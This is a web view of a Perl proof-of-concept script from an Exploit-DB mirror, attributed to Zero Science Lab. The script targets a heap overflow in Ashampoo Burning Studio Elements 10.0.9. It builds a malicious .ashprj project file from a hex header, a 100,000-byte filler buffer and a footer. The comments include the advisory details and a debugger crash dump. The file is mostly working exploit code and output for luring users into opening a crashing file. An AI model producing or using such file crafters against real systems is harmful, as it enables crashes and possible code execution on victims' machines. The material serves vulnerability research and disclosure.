bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/17928.pl
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

157 lines
No EOL
7.7 KiB
Perl
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/perl
#
#
# Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow Vulnerability
#
#
# Vendor: Ashampoo GmbH & Co. KG
# Product web page: http://www.ashampoo.com
# Affected version: 10.0.9
#
# Summary: Ashampoo Burning Studio Elements offers you everything you need to
# burn movies, music and data - fast and effectively. The software with the
# intuitive user interface focuses on the core competencies of burning software
# and offers you compact functions to tackle all tasks relating to your burning
# projects – easily create data discs, burn backups, rip music, create audio CDs
# or burn already existing film files on Blu-ray Disc and lots more.
#
# Desc: The application suffers from a heap overflow vulnerability because it
# fails to properly sanitize user supplied input when parsing .ashprj project
# file format resulting in a crash corrupting the heap-based memory. The
# attacker can use this scenario to lure unsuspecting users to open malicious
# crafted .ashprj files with a potential for arbitrary code execution on the
# affected system.
#
# ---------------------------------------------------------------------------
#
# HEAP[burningstudioelements.exe]: Heap block at 051F7F08 modified at 051F7F86 past requested size of 76
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f86 ecx=7c91d4fd edx=00f1eca5 esi=051f7f08 edi=00000076
# eip=7c90120e esp=00f1eea8 ebp=00f1eeac iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:000> g
# HEAP[burningstudioelements.exe]: Invalid Address specified to RtlFreeHeap( 01A70000, 051F7F10 )
# (f10.26c): Break instruction exception - code 80000003 (first chance)
# eax=051f7f08 ebx=051f7f08 ecx=7c91d4fd edx=00f1ecb6 esi=01a70000 edi=051f7f08
# eip=7c90120e esp=00f1eec0 ebp=00f1eec4 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:000> d edi
# 051f7f08 12 00 06 00 02 07 1a 01-01 00 00 00 e8 5c a0 e6 .............\..
# 051f7f18 cb f9 c3 b3 0c e8 5c a0-e6 cb 41 42 41 42 41 42 ......\...ABABAB
# 051f7f28 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f38 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f48 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f58 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f68 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 42 ABABABABABABABAB
# 051f7f78 41 42 41 42 41 42 41 42-41 42 41 42 41 42 41 ab ABABABABABABABA.
#
# ---------------------------------------------------------------------------
#
#
# Tested on: Microsoft Windows XP Pro SP3 (En)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2011-5050
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5050.php
#
#
# 28.09.2011
#
use strict;
system("color 80");
my $filefm = "Aodrulez.ashprj"; # ;)
&banner;
print "\nThis PoC script will create the $filefm file!\n\n";
system("pause");
my $buffer = "\x41\x42" x 50000;
my $header = "\x61\x73\x68\x70\x72\x6A\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x56". #0x03 (ETX) removed.
"\x45\x52\x53\x08\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01".
"\x00\x00\x00\x66\x50\x52\x4A\xEA\x02\x00\x00\x00\x00\x00\x00\x49".
"\x44\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x70\x00\x72\x00\x6F".
"\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x2E\x00\x64\x00\x61\x00\x74".
"\x00\x61\x00\x64\x00\x69\x00\x73\x00\x63\x00\x66\x50\x50\x53\x00".
"\x00\x00\x00\x00\x00\x00\x00\x66\x50\x52\x4D\x10\x00\x00\x00\x00".
"\x00\x00\x00\x46\x4C\x41\x47\x04\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x66\x43\x4D\x50\x56\x02\x00\x00\x00\x00\x00\x00\x54".
"\x59\x50\x45\x08\x00\x00\x00\x00\x00\x00\x00\x44\x00\x61\x00\x74".
"\x00\x61\x00\x66\x50\x50\x53\x00\x00\x00\x00\x00\x00\x00\x00\x66".
"\x46\x53\x00\x88\x00\x00\x00\x00\x00\x00\x00\x46\x53\x00\x00\x36".
"\x00\x00\x00\x00\x00\x00\x00\x44\x00\x69\x00\x73\x00\x63\x00\x54".
"\x00\x79\x00\x70\x00\x65\x00\x41\x00\x70\x00\x70\x00\x72\x00\x6F".
"\x00\x70\x00\x72\x00\x69\x00\x61\x00\x74\x00\x65\x00\x2E\x00\x50".
"\x00\x72\x00\x69\x00\x6D\x00\x61\x00\x72\x00\x79\x00\x46\x53\x00".
"\x00\x3A\x00\x00\x00\x00\x00\x00\x00\x44\x00\x69\x00\x73\x00\x63".
"\x00\x54\x00\x79\x00\x70\x00\x65\x00\x41\x00\x70\x00\x70\x00\x72".
"\x00\x6F\x00\x70\x00\x72\x00\x69\x00\x61\x00\x74\x00\x65\x00\x2E".
"\x00\x53\x00\x65\x00\x63\x00\x6F\x00\x6E\x00\x64\x00\x61\x00\x72".
"\x00\x79\x00\x4C\x41\x42\x4C\x10\x00\x00\x00\x00\x00\x00\x00\x4D".
"\x00\x79\x00\x20\x00\x46\x00\x69\x00\x6C\x00\x65\x00\x73\x00\x66".
"\x4B\x49\x44\x7A\x01\x00\x00\x00\x00\x00\x00\x66\x46\x44\x52\x6E".
"\x01\x00\x00\x00\x00\x00\x00\x66\x4E\x4F\x44\xC7\x00\x00\x00\x00".
"\x00\x00\x00\x48\x45\x41\x44\x1F\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x80\xEB\x8C\x96\x7D\x35\xE1\xB3\x0C\x80\xEB\x8C\x96".
"\x7D\x35\xE1\xB3\x0C\x80\xEB\x8C\x96\x7D\x35\xE1\xB3\x0C\x4E\x41".
"\x4D\x45\x08\x00\x00\x00\x00\x00\x00\x00\x52\x00\x6F\x00\x6F\x00".
"\x74\x00\x44\x53\x52\x43\x7C\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x74\x00\x00\x00\x66\x00\x69\x00\x6C\x00\x65\x00\x3A\x00".
"\x2F\x00\x2F\x00\x2F\x00\x43\x00\x3A\x00\x2F\x00\x44\x00\x6F\x00".
"\x63\x00\x75\x00\x6D\x00\x65\x00\x6E\x00\x74\x00\x73\x00\x25\x00".
"\x32\x00\x30\x00\x61\x00\x6E\x00\x64\x00\x25\x00\x32\x00\x30\x00".
"\x53\x00\x65\x00\x74\x00\x74\x00\x69\x00\x6E\x00\x67\x00\x73\x00".
"\x2F\x00\x41\x00\x6C\x00\x6C\x00\x25\x00\x32\x00\x30\x00\x55\x00".
"\x73\x00\x65\x00\x72\x00\x73\x00\x2F\x00\x44\x00\x65\x00\x73\x00".
"\x6B\x00\x74\x00\x6F\x00\x70\x00\x2F\x00\x66\x4B\x49\x44\x8F\x00".
"\x00\x00\x00\x00\x00\x00\x66\x4C\x45\x46\x83\x00\x00\x00\x00\x00".
"\x00\x00\x66\x4E\x4F\x44\x77\x00\x00\x00\x00\x00\x00\x00\x48\x45".
"\x41\x44\x27\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xE8\x5C".
"\xA0\xE6\xCB\xF9\xC3\xB3\x0C\xE8\x5C\xA0\xE6\xCB";
my $footer = "\xF9\xC3\xB3\x0C\x28\x80\xBA\xA7\x70\x35\xE1\xB3\x0C\x50\x02\x00".
"\x00\x00\x00\x00\x00\x4E\x41\x4D\x45\x12\x00\x00\x00\x00\x00\x00".
"\x00\x4A\x00\x6F\x00\x78\x00\x79\x00\x31\x00\x2E\x00\x6C\x00\x6E".
"\x00\x6B\x00\x44\x53\x52\x43\x1A\x00\x00\x00\x00\x00\x00\x00\x3A".
"\x00\x00\x00\x12\x00\x00\x00\x4A\x00\x6F\x00\x78\x00\x79\x00\x31".
"\x00\x2E\x00\x6C\x00\x6E\x00\x6B\x00\x66\x43\x4D\x50\x28\x00\x00".
"\x00\x00\x00\x00\x00\x54\x59\x50\x45\x10\x00\x00\x00\x00\x00\x00".
"\x00\x45\x00\x6C\x00\x54\x00\x6F\x00\x72\x00\x69\x00\x74\x00\x6F".
"\x00\x66\x50\x50\x53\x00\x00\x00\x00\x00\x00\x00\x00";
my $fringe = $header.$buffer.$footer;
print "\n - Preparing to write to file...\n";
sleep 1;
open (prj, ">./$filefm") || die "\nCan't open $filefm: $!";
print "\n - Writing to file...\n";
print prj $fringe;
close (prj);
sleep 2;
print "\n - File \"$filefm\" successfully crafted!\n\n - t00t!\n";
sub banner {
print "\n";
print "_" x 51;
print "\n\n Ashampoo Burning Studio Elements 10 Heap Overflow\n\n";
print "\tCopyleft (c) 2011 - Zero Science Lab\n\n";
print "\t\tID: ZSL-2011-5050\n\n";
print "_" x 51;
print "\n";
}
#EOF
Reference in a new issue View git blame Copy permalink